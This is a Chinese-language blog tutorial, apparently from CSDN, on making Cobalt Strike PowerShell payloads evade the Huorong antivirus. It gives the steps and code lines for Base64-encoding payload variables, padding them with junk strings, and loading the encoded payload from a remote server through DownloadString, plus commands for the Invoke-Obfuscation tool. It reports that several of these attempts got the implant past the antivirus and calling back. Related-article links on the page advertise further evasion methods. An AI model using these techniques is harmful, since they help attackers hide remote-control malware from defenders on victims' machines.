免杀对抗-PowerShell-混淆+分离

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量721 收藏 2
点赞数 2
分类专栏: 免杀对抗 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/132910423
版权

演示:PowerShell-生成和上线

1.生成——启动cs,生成两种模式的powershell脚本

文件模式:执行ps1文件上线

命令模式:执行txt文件中的命令上线

2.文件模式powershell执行——两种方法

方法一:打开Win7以上自带的 Windows PowerShell ISE 来执行

成功上线:

方法二:打开命令行,启动PowerShell来执行

命令:powershell

命令:.\payload.ps1

3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行

成功上线:

4.将两种模式的powershell上传到目标系统,都被火绒杀死

演示:PowerShell-文件模式-混淆过某绒

一、手工混淆:

变量进行编码后解码

解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))

1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.

2.在powershell中加上解码代码,保存

3.运行脚本,成功绕过火绒,cs正常上线。

Base64+混淆垃圾数据

1.还可以在编码的基础上在添加垃圾数据。在编码的开头末尾加入相同的值,这样杀毒软件就无法解码识别了。

演示:在编码加入 xiaoheizi ,再将xiaoheizi替换为:''

替换代码:$DoIt=$DoIt.Replace('xiaoheizi','')

2.混淆成功,再次执行。被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。

混淆无文件/分离/无文件落地

1.将文件中变量进行base64编码,然后上传到服务器网站目录下

2.powershell中的变量替换为远程加载,因为变量经过base64编码,所以还有写入解码代码

加载文件:

$DoIt= ((New-Object System.Net.Webclient).DownloadString('http://xiaoheizi.fun/base64.txt'))

3.运行脚本,成功绕过火绒,cs正常上线。

二、项目混淆:Invoke-Obfuscation

介绍:是一款专门做 PowerShell 命令和脚本混淆的项目

下载:https://github.com/danielbohannon/Invoke-Obfuscation

使用:

进入powershell:powershell

加载模块:Import-Module ./Invoke-Obfuscation.psd1

运行程序:Invoke-Obfuscation

处理文件:set scriptpath ps1文件完整路径

处理代码:set scriptblock 'xxxx'

进入编码:encoding

选择编码:1-8

输出文件:out 输出名称    #不指定路径就保存在项目根目录

1.混淆演示:成功混淆

2.将脚本上传到目标系统,被火绒逮住了。所以说这些出名的项目基本都会被杀软记录,导致无法绕过。

xiaoheizi安全
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
node-powershell:从您的NodeJS应用轻松运行PowerShell
05-02
节点-PowerShell Node-PowerShell利用当今技术世界中存在的两个最简单,有效和简便的工具。 一方面, 在javascript领域掀起了一场革命,另一方面, 最近推出了最初的开源,跨平台版本,并将它们连接在一起,使您能够...
selenium-powershell:用于运行Selenium WebDriver的PowerShell模块
05-07
Selenium PowerShell模块 Selenium PowerShell模块允许您使用自动执行浏览器交互。 您可以导航到页面,查找元素,单击按钮,输入文本,甚至拍摄屏幕截图。 寻找维护者 我一直无法跟上此仓库中的问题。 如果您有兴趣...
powershell恶意脚本解混淆
信息安全
11-11 1730
文章目录前言分析总结 前言 现在许多病毒作者为了,使用powershell脚本来执行恶意行为的病毒越来越多,这次分析的一个样本就是利用powershell混淆来隐藏嵌在其中的cs后门dll 分析 样本代码 从图上可以很清晰的知道存放了一段base64数据,首先将base64数据解密,使用gzip解压,解压的数据进行执行 想要解密,也很简单: IEX用于将字符串作为命令执行,当去掉IEX后,再文件尾加上| out-file decode.txt 将 IEX (New-Object IO.StreamRe
对抗-反沙盒+反调试
xiaoheizi的博客
10-07 1114
为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。3.将重新生成的受保护的exe程序再次使用ollydbg调试,可以看到已经不能正常调试了。4.将exe程序放到虚拟机中无法运行,证明代码成功检测出当前处在虚拟环境中。3.msf设置监听,在真机运行exe程序,msf成功上线。3.将exe程序上传到虚拟机,exe程序无法运行。
网络安全最全powershell基础(一)_power进阶(1),2024火爆全网系列
2401_84264010的博客
05-14 384
powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,PowerShell脚本的文本文件,其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境的支持,同时支持.NET对象,其可读性、易用性居所有Shell之首。1、在Windows 7以上的操作系统中是默认安装的。2、PowerShell脚本可以运行在内存中,不需要写入磁盘。3、几乎不会触发毒软件。4、可以远程执行。
107-对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行
qq_46081990的博客
07-13 1414
今天主要讲的是shellcode混淆: 1 、首先明确为什么不对exe类型做手脚,而是对shellcode做手脚?因为对exe类型做手脚(如加壳)可以,但是可能导致出错,无法上线。而对shellcode进行操作,再编译打包成exe,一般不会有这种问题。2 、软如何检测到病毒的?一般是通过逆向分析后门文件,匹配病毒特征检测到的。3 、如何用shellcode实现?今天讲的是使用加密算法(如XOR、AES、Hex、RC4)对shellcode进行加密混淆,实现
第109天:对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换
qq_46081990的博客
07-21 420
【代码】第109天:对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换。
小迪安全-对抗+红队APT
m0_73767545的博客
06-03 260
就是利用字眼,对官网域名进行修改,在.com后加上其他字符,例如.com.cn。判断邮箱是否有spf验证(对IP进行校验,满足即可发送),如果无即可伪造。nslookup -type=txt 邮箱域名后缀。
第112天:对抗-加载器分离&无文件落地&图片隐写&SOCK管道&参数协议化
qq_46081990的博客
07-21 587
之前的课程讲了C/C++、Python、C #、Go、Powershell、Java、ASM等的shellcode混淆加密技术 现在讲的是 "无文件落地&分离拆分" 的,目的是让软即使反编译逆向,也无法在源代码中直接看到shellcode。
第113天:对抗-内存加载&API封装&UUID标识&MAC地址&IPV4地址&各语言
qq_46081990的博客
07-21 392
这里讲的是通过UUID、MAC、Ipv4实现内存加载通常情况下,我们是开辟一块内存,然后直接将shellcode写入到对应的内存中,并且该内存是可读可写可执行的状态,但这种方式太容易被软所查但如果是利用Windows自身提供的API来将加密或者封装好的shellcode写入到内存执行的话,将会大大增加查的难度参考连接:https://www.anquanke.com/post/id/262666。
第115天:对抗-特征码定位&添加花指令&加冷门壳&加反VT保护&资源修改
qq_46081990的博客
07-22 682
之前针对的是没有打包成exe的代码做文章,现在是对打包好了的exe做文章今天针对打包好的exe,介绍了以下几种技术: 1 、通用跳转法:主要思想:通过跳转至其他代码区域执行代码,而不是按照原始代码的顺序线性执行,难以被静态查。利用工具(VirTest)检测特征码的位置,然后将特征码区域汇编移动到全0区域(即空白区),先jmp到移动后的区域,然后再jmp回来继续执行。2 、花指令改入口:花指令就是一些垃圾汇编指令(无实际操作的指令),可以使结构更加混乱,增加查难度,但单纯的花指令效果一般。
第118天:对抗-二开CS&上线流量特征&Shellcode生成机制&反编译重打包(上)
qq_46081990的博客
07-25 896
魔改(二次开发)CS,目的是修改其特征防溯源,或是替换模板让其生成的payload直接达到效果今天的内容主要涉及以下几个方面:(修改前提是将CS的jar文件反编译,修改完后再打包替换) 1 、表面配置特征消除修改CS端口(没改的是50050端口,可修改成其他的端口)修改CS证书配置修改CS加载文件配置 2 、上线流量特征消除采用默认http(s) 的CS请求url为4位字符串(如aaa9),将这4位字符串作为传入,通过算法checksum8会得到92(93) ,蓝队可以以此判定为CS连接器。
Python-PowerShell混淆
08-11
PowerShell 混淆
python通过ssh-powershell监控windows的方法
09-22
主要介绍了python通过ssh-powershell监控windows的方法,涉及Python操作ssh-powershell的相关技巧,需要的朋友可以参考下
at-ps:对抗策略-PowerShell培训
03-21
对抗策略:PowerShell 该课程资料已不再维护,将按原样提供。 SpectreOps最近取消了我们的PowerShell课程,而不是让它收集灰尘,而是本着的,我们希望费将其提供给社区。 我们非常感谢所有能够亲自参加课程的学生...
科普文:Linux系统安全加固指南
最新发布
为无为,事无事,味无味。
07-25 1064
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1104
大语言模型提示注入攻击安全风险分析报告下载
大语言模型(LLM)安全测评基准V1.0 发布版下载
cybtec的博客
07-25 852
大语言模型(LLM)安全测评基准V1.0 发布版下载
Docker+Desktop+-+Unexpected+wSL+error:An+unexpected+error+was+encountered+while+executing+a+WSL+comm
02-20
Docker Desktop is a tool that allows you to run and manage Docker containers on your local machine. It provides an easy-to-use graphical interface for managing containers, images, and networks. The error message "Unexpected wSL error: An unexpected error was encountered while executing a WSL command" typically occurs when there is an issue with the Windows Subsystem for Linux (WSL) component that Docker relies on. To troubleshoot this error, you can try the following steps: 1. Update Docker Desktop: Make sure you are using the latest version of Docker Desktop. Check for updates and install any available updates. 2. Restart Docker Desktop: Sometimes, restarting Docker Desktop can resolve temporary issues. Right-click on the Docker Desktop icon in the system tray and select "Restart". 3. Reset WSL: If the issue persists, you can try resetting the WSL component. Open PowerShell as an administrator and run the following command: ``` wsl --shutdown ``` 4. Reinstall Docker Desktop: If none of the above steps work, you can try uninstalling and reinstalling Docker Desktop. Make sure to backup any important data before uninstalling.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值